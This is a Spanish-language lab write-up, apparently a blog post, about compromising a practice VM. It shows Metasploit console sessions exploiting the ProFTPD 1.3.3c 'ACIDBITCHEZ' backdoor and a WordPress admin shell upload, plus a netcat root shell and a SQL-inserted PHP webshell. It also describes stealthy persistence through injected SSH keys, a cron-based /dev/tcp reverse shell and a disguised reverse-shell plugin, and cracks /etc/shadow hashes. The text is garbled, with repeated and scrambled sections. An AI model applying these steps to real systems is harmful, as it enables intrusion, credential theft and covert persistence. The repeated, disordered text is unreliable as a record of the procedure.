\n- wp-submit=Log In y testcookie=1: Par\u00e1metros fijos requeridos por WordPress.<\/li>\n<\/ul>\n<\/li>\n\n\n\n
- S=Location: Criterio de \u00e9xito \u2192 si hay una cabecera Location: (redirecci\u00f3n 302), el login fue correcto.<\/li>\n<\/ul>\n\n\n\n
Nota:<\/strong> Este comportamiento lo valid\u00e9 previamente usando curl, observando que los logins exitosos redirigen a \/wp-admin\/, mientras que los fallidos devuelven un 200 OK junto a un mensaje de error.<\/p>\n\n\n\nHydra detect\u00f3 como v\u00e1lidas las credenciales admin:admin, confirmando que la configuraci\u00f3n por defecto del CMS no hab\u00eda sido modificada.<\/p>\n\n\n\n
Pentesting en WordPress: explotaci\u00f3n y persistencia<\/h3>\n\n\n\n
Continuamos con el pentesting. Una vez identificada y enumerada correctamente la instalaci\u00f3n de WordPress, pasamos a su explotaci\u00f3n. En este caso, se utilizaron varias t\u00e9cnicas para obtener una shell remota y posteriormente escalar privilegios hasta root.<\/p>\n\n\n\n
Explotaci\u00f3n del panel de administraci\u00f3n<\/h4>\n\n\n\n
WordPress permite la autenticaci\u00f3n al panel de administraci\u00f3n con las credenciales admin:admin. Aprovechando esto, utilic\u00e9 el m\u00f3dulo wp_admin_shell_upload de Metasploit para subir una reverse shell y obtener acceso al sistema.<\/p>\n\n\n\n
msf6 exploit(unix\/webapp\/wp_crop_rce) > use exploit\/unix\/webapp\/wp_admin_shell_upload\n[*] No payload configured, defaulting to php\/meterpreter\/reverse_tcp\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set RHOSTS 192.168.40.138\nRHOSTS => 192.168.40.138\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set TARGETURI \/secret\nTARGETURI => \/secret\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set USERNAME admin\nUSERNAME => admin\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set PASSWORD admin\nPASSWORD => admin\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set LHOST 192.168.40.137\nLHOST => 192.168.40.137\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > exploit\n[*] Started reverse TCP handler on 192.168.40.137:4444 \n[*] Authenticating with WordPress using admin:admin...\n[+] Authenticated with WordPress\n[*] Preparing payload...\n[*] Uploading payload...\n[*] Executing the payload at \/secret\/wp-content\/plugins\/WDRxVQMxpC\/DnCoYqYwFk.php...\n[*] Sending stage (40004 bytes) to 192.168.40.138\n[+] Deleted DnCoYqYwFk.php\n[+] Deleted WDRxVQMxpC.php\n[+] Deleted ..\/WDRxVQMxpC\n[*] Meterpreter session 3 opened (192.168.40.137:4444 -> 192.168.40.138:45728) at 2025-07-30 23:29:28 +0200\n\nmeterpreter > [*] Meterpreter session 1 opened (192.168.40.137:4444 -> 192.168.40.138:45696) at 2025-07-30 23:31:06 +0200<\/code><\/pre>\n\n\n\nLuego verifiqu\u00e9 el usuario:<\/p>\n\n\n\n
meterpreter > getuid\nServer username: www-data\nmeterpreter > shell\nProcess 10609 created.\nChannel 0 created.\nsh: 0: getcwd() failed: No such file or directory\nsh: 0: getcwd() failed: No such file or directory\n\nwhoami\nwww-data<\/code><\/pre>\n\n\n\nSe obtuvo una Shell de Linux con el usuario web de privilegios limitados www-data.<\/p>\n\n\n\n
An\u00e1lisis del fichero de configuraci\u00f3n de WordPress<\/h4>\n\n\n\n
Decido leer el fichero wp-config.php, para ver si encontramos alg\u00fan dato adicional que sea cr\u00edtico.<\/p>\n\n\n\n
cat \/var\/www\/html\/secret\/wp-config.php\n<?php\n\n\/\/ ** MySQL settings - You can get this info from your web host ** \/\/\n\/** The name of the database for WordPress *\/\ndefine('DB_NAME', 'wp_myblog');\n\n\/** MySQL database username *\/\ndefine('DB_USER', 'root');\n\n\/** MySQL database password *\/\ndefine('DB_PASSWORD', 'arootmysqlpass');<\/code><\/pre>\n\n\n\nHemos obtenido las credenciales de una base de datos. Ahora sabemos que hay una BBDD en MySQL y que se accede con el usuario root y la contrase\u00f1a arootmysqlpass.<\/p>\n\n\n\n
Intento de persistencia por SQL Injection manual<\/h4>\n\n\n\n
Ahora que las credenciales ya han sido reveladas, se ha accedido a esta BBDD. Trat\u00e9 de introducir de forma manual una query que me permitiera abrir una puerta trasera a una terminal con permisos de root, pero no lo consegu\u00ed. Se trataba de una webshell en forma de post dentro de la base de datos, usando PHP embebido en una consulta SQL.<\/p>\n\n\n\n
Por si acaso, siempre es recomendable tener una copia de seguridad de la base de datos (lo guardamos en la carpeta tmp, para no levantar demasiadas sospechas):<\/p>\n\n\n\n
mysqldump -u root -p arootmysqlpass > \/tmp\/wordpress_backup.sql<\/code><\/pre>\n\n\n\nDespu\u00e9s, trat\u00e9 lo siguiente:<\/p>\n\n\n\n
mysql -u root -p'arootmysqlpass'\nSHOW DATABASES;\nUSE wp_myblog;\nSELECT * FROM wp_users;<\/code><\/pre>\n\n\n\nEn esa table insertar\u00eda la siguiente query:<\/p>\n\n\n\n
mysql> INSERT INTO wp_posts (post_author, post_date, post_date_gmt, post_content, post_title, post_excerpt, post_status, comment_status, ping_status, post_password, post_name, to_ping,pinged, post_modified, post_modified_gmt, post_content_filtered, post_parent, guid, menu_order, post_type, post_mime_type, comment_count) VALUES (1, NOW(), NOW(), '<?php system($_GET[\"cmd\"]); ?>', 'Hacked', '', 'publish', 'closed', 'closed', '', 'hacked-shell', '', '', NOW(), NOW(), '', 0, '', 0, 'post', '', 0); \nQuery OK, 1 row affected (0.00 sec) \n\nmysql> SELECT ID FROM wp_posts WHERE post_title = 'Hacked';\n+----+ \n| ID | \n+----+\n| 15 | \n+----+ \n1 row in set (0.00 sec)<\/code><\/pre>\n\n\n\nLa idea es que, introduciendo la llamada a PHP ‘<?php system($_GET[\u00abcmd\u00bb]); ?>’ dentro de la query, cuando accediera a la web http:\/\/192.168.40.138\/secret\/wp-admin\/%3C?php_system($_GET%5B%22cmd%22%5D=activate<\/a> se activara una shell. Y, al otro lado, yo tendr\u00eda abierto en una terminal de Kali el NetCat esperando una conexi\u00f3n a esa Shell remota. Sin embargo, el intento no funcion\u00f3 correctamente, posiblemente por el filtrado interno de WordPress o por ubicaci\u00f3n incorrecta del c\u00f3digo en la plantilla.<\/p>\n\n\n\nBackdoor alternativa: Plug-in modificado<\/h4>\n\n\n\n
Para asegurar persistencia, decid\u00ed dejar la base de datos como estaba e intentar otra forma, esta vez a trav\u00e9s de un Plug-In de WordPress. Decid\u00ed instalar a trav\u00e9s de wp-admin un Plug-In modificado por Krysp4<\/a>, que se camufla como una herramienta de env\u00edo de emails, pero que en realidad lanza una reverse Shell. El link a este plug-in est\u00e1 en la desripci\u00f3n del video de YouTube enlazado anteriormente.<\/p>\n\n\n\n
Reconocimiento y enumeraci\u00f3n inicial<\/h2>\n\n\n\n
El primer paso en cualquier ejercicio de pentesting es confirmar la conectividad entre las m\u00e1quinas. De forma preliminar, lanc\u00e9 un ping manual desde Kali Linux hacia la m\u00e1quina objetivo para asegurarme de que ambas estaban en la misma red y pod\u00edan comunicarse. Aunque conoc\u00eda la IP de cada m\u00e1quina (obtenida desde la interfaz de login en la v\u00edctima y con ifconfig en Kali), lo m\u00e1s adecuado en un entorno real ser\u00eda realizar un proceso de enumeraci\u00f3n de red.<\/p>\n\n\n\n
En lugar de hacerlo manualmente, se puede automatizar con scripts que env\u00edan pings a rangos de IP, o utilizar herramientas m\u00e1s potentes como nmap para detectar hosts activos mediante escaneo ARP o ICMP.<\/p>\n\n\n\n
Conociendo la IP de la m\u00e1quina objetivo, he tratado de obtener m\u00e1s informaci\u00f3n. Con la herramienta nmap he hecho un escaneo para conocer los puertos que tiene esta m\u00e1quina abiertos, as\u00ed como los servicios que tiene en ejecuci\u00f3n y sus versiones. He hecho un an\u00e1lisis completo, lo cu\u00e1l incluye los puertos UDP, que muchas veces son olvidados, pero pueden revelar servicios cr\u00edticos.<\/p>\n\n\n\n
\n<\/a>Imagen 1. Zenmap revela servicios ProFTPD, OpenSSH y Apache en la IP 192.168.40.138.<\/p><\/div>\n\n\n\n
Los resultados arrojan que hay tres servicios con los puertos abiertos (FTP, SSH y HTTP). Vamos a ir uno a uno, buscando vulnerabilidades que nos permitan entrar en la m\u00e1quina y escalar privilegios hasta root.<\/p>\n\n\n\n
Pentesting del servicio FTP: ProFTPD<\/h2>\n\n\n\n
Tras detectar que el servicio FTP estaba expuesto en el puerto 21, el siguiente paso fue identificar su versi\u00f3n y verificar si exist\u00edan vulnerabilidades conocidas. En este caso, el sistema utiliza ProFTPD versi\u00f3n 1.3.3c, una versi\u00f3n antigua que presenta varias fallas de seguridad.<\/p>\n\n\n\n
Examinando bases de datos, como las de INCIBE o NIST, encontramos vulnerabilidades. A trav\u00e9s de archive.org y su \u201cwayback machine\u201d podemos acceder a securityfocus<\/a> que, en su d\u00eda, adem\u00e1s de la informaci\u00f3n, ofrec\u00eda los exploits para aprovecharse de la vulnerabilidad.<\/p>\n\n\n\n Lo primero que prob\u00e9 fue la vulnerabilidad CVE\u20112015\u20113306<\/strong>, la cual est\u00e1 en la biblioteca de metasploit. Para aprovecharla, hace falta que el Daemon est\u00e9 compilado con mod_copy y que este m\u00f3dulo este habilitado.<\/p>\n\n\n\n El exploit falla debido a que esta compilaci\u00f3n no trae mod_copy, o si lo trae, no est\u00e1 habilitado.<\/p>\n\n\n\n Vamos a probar ahora la siguiente vulnerabilidad. En 2010 se atac\u00f3 esta versi\u00f3n de ProFTPD, suplantando el binario de su p\u00e1gina web con otro distinto. Esta versi\u00f3n suplantada inclu\u00eda la siguiente l\u00ednea de c\u00f3digo:<\/p>\n\n\n\n Esto permite obtener una shell como root simplemente autentic\u00e1ndose con la cadena especial. Us\u00e9 el m\u00f3dulo proftpd_133c_backdoor de Metasploit para aprovechar esta puerta trasera:<\/p>\n\n\n\n Como se observa, se ha conseguido escalar privilegios a root.<\/p>\n\n\n\n Este mismo proceso se puede hacer con NetCat (nc), y es bastante m\u00e1s sencillo que con Metasploit:<\/p>\n\n\n\n Una vez obtenido el acceso a la m\u00e1quina, una buena pr\u00e1ctica es asegurar alg\u00fan tipo de persistencia, es decir, dejar una puerta trasera que permita volver a entrar en el sistema sin necesidad de repetir toda la explotaci\u00f3n inicial.<\/p>\n\n\n\n Aunque en este caso se trata de un escenario de pruebas, si el sistema se actualizara en el futuro es muy probable que las vulnerabilidades explotadas dejen de ser efectivas. Por eso, tom\u00e9 la precauci\u00f3n de establecer un m\u00e9todo de acceso persistente v\u00eda SSH con clave privada.<\/p>\n\n\n\n En lugar de crear un nuevo usuario \u2014acci\u00f3n que en un entorno real podr\u00eda levantar sospechas\u2014 opt\u00e9 por una alternativa m\u00e1s discreta: inyectar una clave p\u00fablica en un usuario ya existente (marlinspike), habilitando el acceso remoto por SSH sin contrase\u00f1a.<\/p>\n\n\n\n Mi idea es acceder a la m\u00e1quina con una clave privada. Por eso, he creado una pareja de claves RSA en mi m\u00e1quina Kali:<\/p>\n\n\n\n He inyectado la clave p\u00fablica en el directorio \u201c\/home\/marlinspike\/.ssh\/authorized_keys\u201d:<\/p>\n\n\n\n He dado los siguientes permisos:<\/p>\n\n\n\n He modificado el fichero de configuraci\u00f3n \/etc\/ssh\/sshd_config para asegurar que permita la autenticaci\u00f3n por SSH sin contrase\u00f1a y por clave p\u00fablica.<\/p>\n\n\n\n Esto indica que el login por clave p\u00fablica est\u00e1 habilitado, pero el acceso directo como root est\u00e1 restringido por contrase\u00f1a, lo cual no afecta nuestro m\u00e9todo. Da igual, ya que el usuario est\u00e1 en la lista de sudoers.<\/p>\n\n\n\n Desde Kali, valid\u00e9 que pod\u00eda acceder a la m\u00e1quina comprometida usando mi clave privada:<\/p>\n\n\n\n Con esto, ya tengo un acceso estable y discreto que me permitir\u00e1 entrar en cualquier momento sin necesidad de repetir el vector inicial.<\/p>\n\n\n\n Este m\u00e9todo de persistencia es muy com\u00fan en escenarios reales y, aunque puede dejar huella (por ejemplo, en logs o en la fecha de modificaci\u00f3n del archivo authorized_keys), es mucho menos visible que otros mecanismos como creaci\u00f3n de nuevos usuarios o servicios maliciosos.<\/p>\n\n\n\n Adem\u00e1s de garantizar un acceso persistente por SSH, otra estrategia \u00fatil es obtener las credenciales reales del sistema. Esto permite acceder de forma a\u00fan m\u00e1s discreta, sin dejar rastro evidente (como archivos authorized_keys o modificaciones en sshd_config).<\/p>\n\n\n\n Como contaba con privilegios de root, tambi\u00e9n tuve acceso de lectura a los ficheros \/etc\/passwd y \/etc\/shadow.<\/p>\n\n\n\n Estos archivos contienen informaci\u00f3n cr\u00edtica sobre los usuarios y sus contrase\u00f1as encriptadas. Si estas contrase\u00f1as son d\u00e9biles o comunes, pueden romperse f\u00e1cilmente con herramientas como John the Ripper o Hashcat mediante ataques de diccionario o fuerza bruta. \u00a1Vamos a intentarlo!<\/p>\n\n\n\n En el fichero passwd encontramos la siguiente l\u00ednea:<\/p>\n\n\n\n El formato nos interesa conocer es el siguiente: $id$salt$hashedpassword. Sabemos que hay un usuario llamado marlinspike, por el ID 6 descubrimos que la contrase\u00f1a est\u00e1 cifrada a trav\u00e9s de SHA512-crypt, y que tiene una salt (wQb5nV3T), esto quiere decir que se le a\u00f1ade un valor aleatorio \u00fanico a la palabra (en este caso contrase\u00f1a) a cifrar.<\/p>\n\n\n\n La sal aumenta la entrop\u00eda o aleatoriedad, haci\u00e9ndolo m\u00e1s robusto ante tablas arco\u00edris o ataques de fuerza bruta por b\u00fasqueda de hash. Finalmente, despu\u00e9s de la sal aparece el resumen de la contrase\u00f1a cifrada con esa sal. Si la contrase\u00f1a es sencilla y vulnerable a ataques de diccionario, la sal no va a hacer milagros.<\/p>\n\n\n\n Cabe decir que SHA512-crypt est\u00e1 dise\u00f1ado para ser computacionalmente costoso, de forma que dificulte ataques de fuerza bruta o diccionario. A\u00fan as\u00ed, si la contrase\u00f1a es d\u00e9bil, puede romperse con herramientas como John the Ripper.<\/p>\n\n\n\n He copiado en mi m\u00e1quina Kali los dos ficheros mencionados, passwd y shadow. Para intentar descifrar la contrase\u00f1a, combin\u00e9 ambos archivos con unshadow, y ejecut\u00e9 el ataque (limpiando primero cualquier salida de alguna ejecuci\u00f3n anterior):<\/p>\n\n\n\n El proceso fue casi inmediato. La contrase\u00f1a del usuario se correspond\u00eda con su nombre, es decir \u201cmarlinspike\u201d. Era un escenario muy sencillo y se ha logrado encontrar la contrase\u00f1a con John the Ripper. Esto demuestra la importancia de utilizar contrase\u00f1as seguras, ya que ahora tenemos acceso a la m\u00e1quina a trav\u00e9s de este usuario, y adem\u00e1s est\u00e1 en la lista de sudoers.<\/p>\n\n\n\n Con esto hemos logrado ya el objetivo principal, que es escalar privilegios en una m\u00e1quina. No obstante, vamos a seguir investigando qu\u00e9 otras cosas podemos hacer.<\/p>\n\n\n\n Adem\u00e1s de dejar una clave SSH o descifrar la contrase\u00f1a del usuario, existe una t\u00e9cnica a\u00fan m\u00e1s discreta para mantener el acceso: crear una reverse shell persistente mediante un cronjob que se ejecuta de forma peri\u00f3dica.<\/p>\n\n\n\n Esta t\u00e9cnica aprovecha una funcionalidad poco conocida de Bash: la posibilidad de abrir sockets directamente desde el int\u00e9rprete de comandos, gracias a que en Unix todo es un archivo, incluidos los sockets TCP.<\/p>\n\n\n\n Bash permite enviar y recibir datos a trav\u00e9s de sockets TCP utilizando rutas especiales como \/dev\/tcp\/IP\/PUERTO. Esto hace posible lanzar una reverse shell sin herramientas externas:<\/p>\n\n\n\n Esto conecta la shell interactiva directamente al atacante, redirigiendo la entrada\/salida est\u00e1ndar al socket TCP. Es una t\u00e9cnica ligera y funcional incluso en entornos muy restringidos.<\/p>\n\n\n\n Para mantener el acceso activo incluso tras un reinicio del sistema o p\u00e9rdida de conexi\u00f3n, podemos automatizar esta reverse shell con un cronjob:<\/p>\n\n\n\n Esto genera una tarea programada que se ejecuta cada minuto, estableciendo una nueva reverse shell con el atacante. Desde la perspectiva del sistema, es simplemente un proceso de Bash ejecutando un script, lo cual puede pasar desapercibido si no se monitoriza la salida de crontab -l.<\/p>\n\n\n\n Durante la fase de enumeraci\u00f3n de servicios, detect\u00e9 que el servidor Apache estaba activo en el puerto 80. Esto abr\u00eda la posibilidad de encontrar un nuevo vector de entrada, especialmente si el contenido expuesto o la configuraci\u00f3n del servidor presentaban vulnerabilidades.<\/p>\n\n\n\n Al acceder inicialmente v\u00eda navegador a http:\/\/192.168.40.138, aparece la cl\u00e1sica p\u00e1gina de \u00abIt Works!\u00bb de Apache. Esto indica que el servidor est\u00e1 activo, pero no revela informaci\u00f3n \u00fatil\u2026 al menos a simple vista.<\/p>\n\n\n\n Para descubrir rutas ocultas, utilic\u00e9 Gobuster, una herramienta de enumeraci\u00f3n de directorios y archivos basada en diccionario:<\/p>\n\n\n\n La herramienta gobuster enumera los archivos ocultos junto con los directorios remotos. Gobuster es un esc\u00e1ner agresivo, es ruidoso y se hace notar. En este escenario nos vale, y nos ha permitido descubrir el directorio \u201csecret\u201d. Esto es interesante, ya que redirige a una p\u00e1gina no listada en la ra\u00edz.<\/p>\n\n\n\n Otra herramienta es Nikto, un esc\u00e1ner de servidor web de c\u00f3digo abierto (GPL) y de uso gratuito que realiza un escaneo de vulnerabilidades en servidores web. Busca m\u00faltiples elementos, incluyendo archivos y programas peligrosos, as\u00ed como versiones desactualizadas del software del servidor web. Tambi\u00e9n comprueba si hay errores de configuraci\u00f3n del servidor y las posibles vulnerabilidades que puedan haber introducido.<\/p>\n\n\n\n En resumen, esta salida nos est\u00e1 diciendo que el servidor usa Apache\/2.4.18 (Ubuntu), una versi\u00f3n antigua con riesgos de seguridad conocidos. Falta de cabeceras de protecci\u00f3n como X-Frame-Options y X-Content-Type-Options, lo que facilita ataques como clickjacking. El servidor tiene el m\u00e9todo HTTP OPTIONS habilitado, exponiendo informaci\u00f3n innecesaria. Adem\u00e1s, el archivo \/icons\/README es accesible, revelando detalles de la configuraci\u00f3n.<\/p>\n\n\n\n Adem\u00e1s, esta herramienta tambi\u00e9n encontr\u00f3 el directorio oculto (\/secret\/) con una cabecera HTTP vinculada a sistemas como WordPress o Drupal, sugiriendo una posible instalaci\u00f3n de WordPress, la cual investigaremos en el siguiente apartado. Hay que decir tambi\u00e9n que Nikto nos est\u00e1 dando pistas, indicando que miremos algunas de las CVE que ha encontrado durante su an\u00e1lisis.<\/p>\n\n\n\n Ya hemos visto que en apache est\u00e1 accesible una ruta que es la IP de la m\u00e1quina y el directorio secret. Alcanzando esa ruta, se llega a una p\u00e1gina creada con WordPress:<\/p>\n\n\n\n Imagen 2. Interfaz por defecto de WordPress identificada como punto de entrada potencial.<\/p><\/div>\n\n\n\n Detect\u00e9 que las URLs internas del sitio estaban asociadas al dominio vtcsec. Aunque segu\u00eda siendo accesible mediante la IP, para mayor comodidad a\u00f1ad\u00ed una entrada en el archivo \/etc\/hosts.<\/p>\n\n\n\n Esto permite trabajar con nombres de dominio en lugar de IPs.<\/p>\n\n\n\n Si entramos en la entrada del blog, podemos ver qu\u00e9 usuario la ha publicado, admin.<\/p>\n\n\n\n Imagen 3. El autor del post de bienvenida permite identificar credenciales objetivo.<\/p><\/div>\n\n\n\n A continuaci\u00f3n, utilizo wpscan para identificar informaci\u00f3n clave del CMS:<\/p>\n\n\n\n Nos ha arrojado informaci\u00f3n que ya ten\u00edamos sobre Apache y sobre el usuario de WordPress, confirmando que es \u201cadmin\u201d. Si estuvi\u00e9ramos registrados en su web, recebiriamos un token para su API, a trav\u00e9s del cual podr\u00edamos tener informaci\u00f3n adicional sobre vulnerabilidades CVE presentes en su correspondiente versi\u00f3n.<\/p>\n\n\n\n Conociendo wordpress, es frecuente que exista una p\u00e1gina llamada wp-admin. Y efectivamente, si entramos en vtcsec\/secret\/wp-admin encontramos la pantalla de login. He probado con las credenciales por defecto (usuario \u201cadmin\u201d y contrase\u00f1a \u201cadmin\u201d y me ha dejado acceder al panel. Esto no deber\u00eda ocurrir, pero ya vemos que no estaba securizado. Esto representa una falla cr\u00edtica de seguridad al no haber sido cambiadas las credenciales predeterminadas.<\/p>\n\n\n\n Imagen 4. Pantalla de login en WordPress para ingresar con el usuario admin.<\/p><\/div>\n\n\n\n Las cosas no siempre son as\u00ed de f\u00e1ciles, es por ello que existen otras formas de conseguir acceso, o de buscar la contrase\u00f1a (o al menos, intentarlo). Una opci\u00f3n es con Hydra. Lanc\u00e9 un ataque de fuerza bruta con el diccionario \u201crockyou.txt\u201d.<\/p>\n\n\n\n Explicaci\u00f3n r\u00e1pida del commando:<\/p>\n\n\n\n Nota:<\/strong> Este comportamiento lo valid\u00e9 previamente usando curl, observando que los logins exitosos redirigen a \/wp-admin\/, mientras que los fallidos devuelven un 200 OK junto a un mensaje de error.<\/p>\n\n\n\n Hydra detect\u00f3 como v\u00e1lidas las credenciales admin:admin, confirmando que la configuraci\u00f3n por defecto del CMS no hab\u00eda sido modificada.<\/p>\n\n\n\n Continuamos con el pentesting. Una vez identificada y enumerada correctamente la instalaci\u00f3n de WordPress, pasamos a su explotaci\u00f3n. En este caso, se utilizaron varias t\u00e9cnicas para obtener una shell remota y posteriormente escalar privilegios hasta root.<\/p>\n\n\n\n WordPress permite la autenticaci\u00f3n al panel de administraci\u00f3n con las credenciales admin:admin. Aprovechando esto, utilic\u00e9 el m\u00f3dulo wp_admin_shell_upload de Metasploit para subir una reverse shell y obtener acceso al sistema.<\/p>\n\n\n\n Luego verifiqu\u00e9 el usuario:<\/p>\n\n\n\n Se obtuvo una Shell de Linux con el usuario web de privilegios limitados www-data.<\/p>\n\n\n\n Decido leer el fichero wp-config.php, para ver si encontramos alg\u00fan dato adicional que sea cr\u00edtico.<\/p>\n\n\n\n Hemos obtenido las credenciales de una base de datos. Ahora sabemos que hay una BBDD en MySQL y que se accede con el usuario root y la contrase\u00f1a arootmysqlpass.<\/p>\n\n\n\n Ahora que las credenciales ya han sido reveladas, se ha accedido a esta BBDD. Trat\u00e9 de introducir de forma manual una query que me permitiera abrir una puerta trasera a una terminal con permisos de root, pero no lo consegu\u00ed. Se trataba de una webshell en forma de post dentro de la base de datos, usando PHP embebido en una consulta SQL.<\/p>\n\n\n\n Por si acaso, siempre es recomendable tener una copia de seguridad de la base de datos (lo guardamos en la carpeta tmp, para no levantar demasiadas sospechas):<\/p>\n\n\n\n Despu\u00e9s, trat\u00e9 lo siguiente:<\/p>\n\n\n\n En esa table insertar\u00eda la siguiente query:<\/p>\n\n\n\n La idea es que, introduciendo la llamada a PHP ‘<?php system($_GET[\u00abcmd\u00bb]); ?>’ dentro de la query, cuando accediera a la web http:\/\/192.168.40.138\/secret\/wp-admin\/%3C?php_system($_GET%5B%22cmd%22%5D=activate<\/a> se activara una shell. Y, al otro lado, yo tendr\u00eda abierto en una terminal de Kali el NetCat esperando una conexi\u00f3n a esa Shell remota. Sin embargo, el intento no funcion\u00f3 correctamente, posiblemente por el filtrado interno de WordPress o por ubicaci\u00f3n incorrecta del c\u00f3digo en la plantilla.<\/p>\n\n\n\n Para asegurar persistencia, decid\u00ed dejar la base de datos como estaba e intentar otra forma, esta vez a trav\u00e9s de un Plug-In de WordPress. Decid\u00ed instalar a trav\u00e9s de wp-admin un Plug-In modificado por Krysp4<\/a>, que se camufla como una herramienta de env\u00edo de emails, pero que en realidad lanza una reverse Shell. El link a este plug-in est\u00e1 en la desripci\u00f3n del video de YouTube enlazado anteriormente.<\/p>\n\n\n\nPrimer intento: Exploit mod_copy (CVE-2015-3306)<\/h3>\n\n\n\n
msf6 > use exploit\/unix\/ftp\/proftpd_modcopy_exec \n[*] No payload configured, defaulting to cmd\/unix\/reverse_netcat\nmsf6 exploit(unix\/ftp\/proftpd_modcopy_exec) > set RHOSTS 192.168.40.138\nRHOSTS => 192.168.40.138\nmsf6 exploit(unix\/ftp\/proftpd_modcopy_exec) > set RPORT 21\nRPORT => 21\nmsf6 exploit(unix\/ftp\/proftpd_modcopy_exec) > run\n[*] Started reverse TCP handler on 192.168.40.137:4444 \n[*] 192.168.40.138:21 - 192.168.40.138:21 - Connected to FTP server\n[*] 192.168.40.138:21 - 192.168.40.138:21 - Sending copy commands to FTP server\n[-] 192.168.40.138:21 - Exploit aborted due to failure: unknown: 192.168.40.138:21 - Failure copying from \/proc\/self\/cmdline\n[*] Exploit completed, but no session was created.<\/code><\/pre>\n\n\n\nSegundo intento: Backdoor \u00abACIDBITCHEZ\u00bb<\/h3>\n\n\n\n
if (strcmp(target, \"ACIDBITCHEZ\") == 0) {\nsetuid(0);\nsetgid(0);\nsystem(\"\/bin\/sh;\/sbin\/sh\");\n}<\/code><\/pre>\n\n\n\nmsf6 exploit(unix\/ftp\/proftpd_modcopy_exec) > use exploit\/unix\/ftp\/proftpd_133c_backdoor\nmsf6 exploit(unix\/ftp\/proftpd_133c_backdoor) > set RHOSTS 192.168.40.138\nRHOSTS => 192.168.40.138\nmsf6 exploit(unix\/ftp\/proftpd_133c_backdoor) > set RPORT 21\nRPORT => 21\nmsf6 exploit(unix\/ftp\/proftpd_133c_backdoor) > set PAYLOAD cmd\/unix\/reverse_\nset PAYLOAD cmd\/unix\/reverse_bash_telnet_ssl\nset PAYLOAD cmd\/unix\/reverse_perl\nset PAYLOAD cmd\/unix\/reverse_perl_ssl\nset PAYLOAD cmd\/unix\/reverse_ssl_double_telnet\nmsf6 exploit(unix\/ftp\/proftpd_133c_backdoor) > set PAYLOAD cmd\/unix\/reverse\nset PAYLOAD cmd\/unix\/reverse\nset PAYLOAD cmd\/unix\/reverse_bash_telnet_ssl\nset PAYLOAD cmd\/unix\/reverse_perl\nset PAYLOAD cmd\/unix\/reverse_perl_ssl\nset PAYLOAD cmd\/unix\/reverse_ssl_double_telnet\nmsf6 exploit(unix\/ftp\/proftpd_133c_backdoor) > set PAYLOAD cmd\/unix\/reverse\nPAYLOAD => cmd\/unix\/reverse\nmsf6 exploit(unix\/ftp\/proftpd_133c_backdoor) > set LHOST 192.168.40.137\nLHOST => 192.168.40.137\nmsf6 exploit(unix\/ftp\/proftpd_133c_backdoor) > run\n[*] Started reverse TCP double handler on 192.168.40.137:4444 \n[*] 192.168.40.138:21 - Sending Backdoor Command\n[*] Accepted the first client connection...\n[*] Accepted the second client connection...\n[*] Command: echo Fmfm9tBLdbvaYnqy;\n[*] Writing to socket A\n[*] Writing to socket B\n[*] Reading from sockets...\n[*] Reading from socket B\n[*] B: \"Fmfm9tBLdbvaYnqy\\r\\n\"\n[*] Matching...\n[*] A is input...\n[*] Command shell session 1 opened (192.168.40.137:4444 -> 192.168.40.138:44946) at 2025-07-17 17:35:28 -0400\nwhoami\nroot<\/code><\/pre>\n\n\n\nAlternativa: Explotando la backdoor con NetCat<\/h4>\n\n\n\n
\u250c\u2500\u2500(osboxes\u327fosboxes)-[~]\n\u2514\u2500$ nc 192.168.40.138 21 \n220 ProFTPD 1.3.3c Server (vtcsec) [192.168.40.138]\nHELP ACIDBITCHEZ\nwhoami \nroot<\/code><\/pre>\n\n\n\nPersistencia en sistemas comprometidos<\/h2>\n\n\n\n
Alternativa 1: Acceso con clave privada<\/h3>\n\n\n\n
Generaci\u00f3n de la pareja de claves e inyecci\u00f3n<\/h4>\n\n\n\n
ssh-keygen -t rsa -b 4096 -f ~\/.ssh\/basicp1_rsa -C \"basic-pentesting-lab\"<\/code><\/pre>\n\n\n\necho \"ssh-rsa AAAAB3NzaC1yc \u2026 \/RbB5\/7vydaTQ2Q== basic-pentesting-lab\" >> \/home\/marlinspike\/.ssh\/authorized_keys<\/code><\/pre>\n\n\n\nchmod 700 \/home\/marlinspike\/.ssh\nchmod 600 \/home\/marlinspike\/.ssh\/authorized_keys\nchown -R marlinspike:marlinspike \/home\/marlinspike\/.ssh<\/code><\/pre>\n\n\n\nConfiguraci\u00f3n del servicio SSH<\/h4>\n\n\n\n
grep -E 'PermitRootLogin|PasswordAuthentication|PubkeyAuthentication|UsePAM' \/etc\/ssh\/sshd_config\nPermitRootLogin prohibit-password\nPubkeyAuthentication yes\n#PasswordAuthentication yes\nUsePAM yes<\/code><\/pre>\n\n\n\nVerificaci\u00f3n del acceso persistente<\/h4>\n\n\n\n
\u250c\u2500\u2500(osboxes\u327fosboxes)-[~\/.ssh]\n\u2514\u2500$ ssh -i ~\/.ssh\/basicp1_rsa marlinspike@192.168.40.138\nWelcome to Ubuntu 16.04.3 LTS (GNU\/Linux 4.10.0-28-generic x86_64)<\/code><\/pre>\n\n\n\nAlternativa 2: Descifrando la contrase\u00f1a del usuario<\/h3>\n\n\n\n
An\u00e1lisis del hash extraido<\/h4>\n\n\n\n
marlinspike:$6$wQb5nV3T$xB2WO\/jOkbn4t1RUILrckw69LR\/0EMtUbFFCYpM3MUHVmtyYW9.ov\/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4\/:17484:0:99999:7:::<\/code><\/pre>\n\n\n\nAtaque con John the Ripper<\/h4>\n\n\n\n
